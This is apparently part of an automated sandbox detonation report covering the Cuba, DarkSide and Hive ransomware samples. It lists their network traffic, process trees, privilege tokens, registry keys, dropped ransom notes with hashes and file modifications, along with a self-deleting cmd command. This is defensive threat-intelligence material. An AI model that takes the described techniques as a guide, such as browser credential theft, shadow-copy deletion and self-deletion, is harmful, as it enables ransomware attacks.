N/A	10.127.255.149:445		tcp
N/A	10.127.255.236:445		tcp
N/A	10.127.255.211:445		tcp
N/A	10.127.255.229:445		tcp
N/A	10.127.255.243:445		tcp
N/A	10.127.255.185:445		tcp
N/A	10.127.255.197:445		tcp
N/A	10.127.255.186:445		tcp
N/A	10.127.255.218:445		tcp
N/A	10.127.255.239:445		tcp
N/A	10.127.255.207:445		tcp
N/A	10.127.255.209:445		tcp
N/A	10.127.255.217:445		tcp
N/A	10.127.255.237:445		tcp
N/A	10.127.255.238:445		tcp
N/A	10.127.255.183:445		tcp
N/A	10.127.255.246:445		tcp
N/A	10.127.255.234:445		tcp
N/A	10.127.255.216:445		tcp
N/A	10.127.255.251:445		tcp
N/A	10.127.255.226:445		tcp
N/A	10.127.255.235:445		tcp
N/A	10.127.255.191:445		tcp
N/A	10.127.255.223:445		tcp
N/A	10.127.255.210:445		tcp
N/A	10.127.255.230:445		tcp
N/A	10.127.255.203:445		tcp
N/A	10.127.255.221:445		tcp
N/A	10.127.255.225:445		tcp
N/A	10.127.255.212:445		tcp
N/A	10.127.255.250:445		tcp
N/A	10.127.255.198:445		tcp
N/A	10.127.255.249:445		tcp
N/A	10.127.255.199:445		tcp
N/A	10.127.255.215:445		tcp
N/A	10.127.255.248:445		tcp
N/A	10.127.255.214:445		tcp
N/A	10.127.255.190:445		tcp
N/A	10.127.255.202:445		tcp
N/A	10.127.255.228:445		tcp
N/A	10.127.255.220:445		tcp
N/A	10.127.255.222:445		tcp
N/A	10.127.255.181:445		tcp
N/A	10.127.255.219:445		tcp
N/A	10.127.255.184:445		tcp
N/A	10.127.255.205:445		tcp
N/A	10.127.255.194:445		tcp
N/A	10.127.255.196:445		tcp
N/A	10.127.255.244:445		tcp
N/A	10.127.255.192:445		tcp
N/A	10.127.255.204:445		tcp
N/A	10.127.255.240:445		tcp
N/A	10.127.255.242:445		tcp
N/A	10.127.255.187:445		tcp
N/A	10.127.255.206:445		tcp
N/A	10.127.255.231:445		tcp
N/A	10.127.255.227:445		tcp
N/A	10.127.255.182:445		tcp
N/A	10.127.255.189:445		tcp
N/A	10.127.255.201:445		tcp
N/A	10.127.255.247:445		tcp
N/A	10.127.255.193:445		tcp
N/A	10.127.255.241:445		tcp
N/A	10.127.255.208:445		tcp
N/A	10.127.255.200:445		tcp
N/A	10.127.255.233:445		tcp
N/A	10.127.255.195:445		tcp
N/A	10.127.255.224:445		tcp
N/A	10.127.255.232:445		tcp
N/A	10.127.255.188:445		tcp
N/A	10.127.255.213:445		tcp
N/A	10.127.255.245:445		tcp
N/A	10.127.255.253:445		tcp
N/A	10.127.255.254:445		tcp
N/A	10.127.255.252:445		tcp
US	8.8.8.8:53	157.123.68.40.in-addr.arpa	udp
US	8.8.8.8:53	171.39.242.20.in-addr.arpa	udp
US	8.8.8.8:53	172.210.232.199.in-addr.arpa	udp
US	8.8.8.8:53	147.142.123.92.in-addr.arpa	udp
N/A	10.127.0.147:445		tcp
US	8.8.8.8:53	97.17.167.52.in-addr.arpa	udp
US	8.8.8.8:53	88.156.103.20.in-addr.arpa	udp

Files

C:\ProgramData\R3ADM3.txt

MD5	e6f001fc98cb51a0429ca5dc95f6a950
SHA1	16a73b95d0b5408fa95c97bc9f314f1eff4902b4
SHA256	acf1bb83790c25806dd3c29e0b453002397c7fe7abc25a3470ae4e3164f9f31b
SHA512	11e65ed0e80aedb497ab40edf5d3f756b121527cb1102408cdd9f146549c849a41a16fc908bb284c920b061c6b37723117b929de150a62cd61273c40e660168c

Analysis: behavioral15

Detonation Overview

Submitted

2024-07-28 16:38

Reported

2024-07-28 16:42

Platform

win7-20240708-en

Max time kernel

119s

Max time network

123s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe"

Signatures

Deletes itself

Description	Indicator	Process	Target
N/A	N/A	C:\Windows\SysWOW64\cmd.exe	N/A

System Location Discovery: System Language Discovery

discovery

Description	Indicator	Process	Target
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe	N/A
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	C:\Windows\SysWOW64\cmd.exe	N/A

Suspicious behavior: EnumeratesProcesses

Description	Indicator	Process	Target
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe	N/A

Suspicious use of WriteProcessMemory

Description	Indicator	Process	Target
PID 2484 wrote to memory of 2380	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe	C:\Windows\SysWOW64\cmd.exe
PID 2484 wrote to memory of 2380	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe	C:\Windows\SysWOW64\cmd.exe
PID 2484 wrote to memory of 2380	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe	C:\Windows\SysWOW64\cmd.exe
PID 2484 wrote to memory of 2380	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe	C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe"

C:\Windows\SysWOW64\cmd.exe

/c del C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Cuba_08_03_2021_1130KB.exe >> NUL

Network

N/A

Files

memory/2484-0-0x00000000003A0000-0x0000000000400000-memory.dmp

memory/2484-4-0x0000000000400000-0x000000000046C000-memory.dmp

C:\Program Files\Common Files\Microsoft Shared\ink\bg-BG\!!FAQ for Decryption!!.txt

MD5	69acb73a5829bdddc9a7cf322178c70f
SHA1	3cd71f6cc40c90322e027712403899db2976218b
SHA256	9aaf714f40a29e0b10c038a79e26a95a934b7eeec3512a970d8c80f8a6daebd5
SHA512	380b506e330f4592cceee56334131cf6493bd989464afc5503bbd6bec0b9073475cfabbd8f37e471cac9f67fbfe07e747660ff6b9f5e0d9d14761e80ead6c57e

memory/2484-5968-0x0000000000400000-0x000000000051D000-memory.dmp

memory/2484-8573-0x0000000000400000-0x000000000051D000-memory.dmp

memory/2484-8574-0x0000000000400000-0x000000000046C000-memory.dmp

Analysis: behavioral22

Detonation Overview

Submitted

2024-07-28 16:38

Reported

2024-07-28 16:43

Platform

win10v2004-20240704-en

Max time kernel

147s

Max time network

161s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe"

Signatures

DarkSide

ransomware darkside

Credentials from Password Stores: Credentials from Web Browsers

credential_access stealer

Renames multiple (127) files with added filename extension

ransomware

Credentials from Password Stores: Windows Credential Manager

credential_access stealer

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx

Description	Indicator	Process	Target
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A

Command and Scripting Interpreter: PowerShell

execution

Description	Indicator	Process	Target
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A

Browser Information Discovery

discovery

System Location Discovery: System Language Discovery

discovery

Description	Indicator	Process	Target
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe	N/A

Suspicious behavior: EnumeratesProcesses

Description	Indicator	Process	Target
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe	N/A

Suspicious use of AdjustPrivilegeToken

Description	Indicator	Process	Target
Token: SeIncreaseQuotaPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe	N/A
Token: SeSecurityPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe	N/A
Token: SeTakeOwnershipPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe	N/A
Token: SeLoadDriverPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe	N/A
Token: SeSystemProfilePrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe	N/A
Token: SeSystemtimePrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe	N/A
Token: SeProfSingleProcessPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe	N/A
Token: SeIncBasePriorityPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe	N/A
Token: SeCreatePagefilePrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe	N/A
Token: SeBackupPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe	N/A
Token: SeRestorePrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe	N/A
Token: SeShutdownPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe	N/A
Token: SeDebugPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe	N/A
Token: SeSystemEnvironmentPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe	N/A
Token: SeRemoteShutdownPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe	N/A
Token: SeUndockPrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe	N/A
Token: SeManageVolumePrivilege	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe	N/A
Token: 33	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe	N/A
Token: 34	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe	N/A
Token: 35	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe	N/A
Token: 36	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe	N/A
Token: SeDebugPrivilege	N/A	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	N/A
Token: SeBackupPrivilege	N/A	C:\Windows\system32\vssvc.exe	N/A
Token: SeRestorePrivilege	N/A	C:\Windows\system32\vssvc.exe	N/A
Token: SeAuditPrivilege	N/A	C:\Windows\system32\vssvc.exe	N/A

Suspicious use of WriteProcessMemory

Description	Indicator	Process	Target
PID 1796 wrote to memory of 3048	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1796 wrote to memory of 3048	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

Network

Country	Destination	Domain	Proto
US	8.8.8.8:53	228.249.119.40.in-addr.arpa	udp
US	8.8.8.8:53	4.159.190.20.in-addr.arpa	udp
US	8.8.8.8:53	43.58.199.20.in-addr.arpa	udp
US	8.8.8.8:53	196.249.167.52.in-addr.arpa	udp
US	8.8.8.8:53	28.118.140.52.in-addr.arpa	udp
US	8.8.8.8:53	171.39.242.20.in-addr.arpa	udp
US	8.8.8.8:53	157.123.68.40.in-addr.arpa	udp
US	8.8.8.8:53	240.221.184.93.in-addr.arpa	udp
US	8.8.8.8:53	tse1.mm.bing.net	udp
US	150.171.28.10:443	tse1.mm.bing.net	tcp
US	150.171.28.10:443	tse1.mm.bing.net	tcp
US	150.171.28.10:443	tse1.mm.bing.net	tcp
US	150.171.28.10:443	tse1.mm.bing.net	tcp
US	150.171.28.10:443	tse1.mm.bing.net	tcp
US	8.8.8.8:53	57.169.31.20.in-addr.arpa	udp

Files

memory/1796-0-0x0000000000600000-0x0000000000610000-memory.dmp

memory/3048-1-0x00007FFE83CF3000-0x00007FFE83CF5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4bdd4k2e.eu3.ps1

MD5	d17fe0a3f47be24a6453e9ef58c94641
SHA1	6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256	96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512	5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3048-7-0x000001952DCA0000-0x000001952DCC2000-memory.dmp

memory/3048-12-0x00007FFE83CF0000-0x00007FFE847B1000-memory.dmp

memory/3048-13-0x00007FFE83CF0000-0x00007FFE847B1000-memory.dmp

memory/3048-16-0x00007FFE83CF0000-0x00007FFE847B1000-memory.dmp

C:\Users\README.f0ea3e68.TXT

MD5	25d0b19a0ec34a39dfa3e177866f01a3
SHA1	a3704d1f6499738ccd694bdd6008a850c6b2e453
SHA256	f030ee74e406acb06d43e73c5127df0206e8affc85b95e9895b100d89391dea8
SHA512	ede7562f04b5f9abf792196ae87d82e14d651dc70e9a5b5ec0e9cb14d13aba27f8ebfacda2191de48dff882131dfad8c7bad51e7fb89b71dd3bbe748adc77198

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5	556084f2c6d459c116a69d6fedcc4105
SHA1	633e89b9a1e77942d822d14de6708430a3944dbc
SHA256	88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA512	0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

memory/1796-27-0x0000000000600000-0x0000000000610000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5	5647a0da4edc301549f81d9015b8e9b8
SHA1	eda70ece2fc3923bdd6e17346b58e3dbcd07c858
SHA256	6b06c632900ca1b6e2ab120232c79a002c45d120c76cede99af97a16112c70be
SHA512	0731968ea61cde891b12110f6d933d3d93e7342eddf2e71d1cfa7eceff49c22778324c4a122423cbe62ad0d6fe342705c5557243bf45133688602a62efe78e5e

memory/1796-193-0x0000000000600000-0x0000000000610000-memory.dmp

memory/1796-200-0x0000000000600000-0x0000000000610000-memory.dmp

Analysis: behavioral28

Detonation Overview

Submitted

2024-07-28 16:38

Reported

2024-07-28 16:43

Platform

win10v2004-20240709-en

Max time kernel

88s

Max time network

158s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe"

Signatures

Detects Go variant of Hive Ransomware

Description	Indicator	Process	Target
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A

Hive

ransomware hive

Deletes shadow copies

ransomware defense_evasion impact execution

Drops startup file

Description	Indicator	Process	Target
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx

Description	Indicator	Process	Target
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A
N/A	N/A	N/A	N/A

Drops desktop.ini file(s)

Description	Indicator	Process	Target
File opened for modification	C:\Users\Admin\3D Objects\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Admin\Searches\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Admin\Music\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Public\Pictures\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Admin\Favorites\Links\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Public\Downloads\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Admin\Downloads\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Admin\Videos\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Public\Music\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\$Recycle.Bin\S-1-5-21-2990742725-2267136959-192470804-1000\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files (x86)\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Admin\OneDrive\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Admin\Saved Games\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AccountPictures\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Admin\Contacts\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Admin\Pictures\Camera Roll\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Public\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Admin\Documents\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Admin\Favorites\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn1\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Public\Desktop\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Public\Videos\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\Users\Public\Libraries\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	F:\$RECYCLE.BIN\S-1-5-21-2990742725-2267136959-192470804-1000\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe	N/A
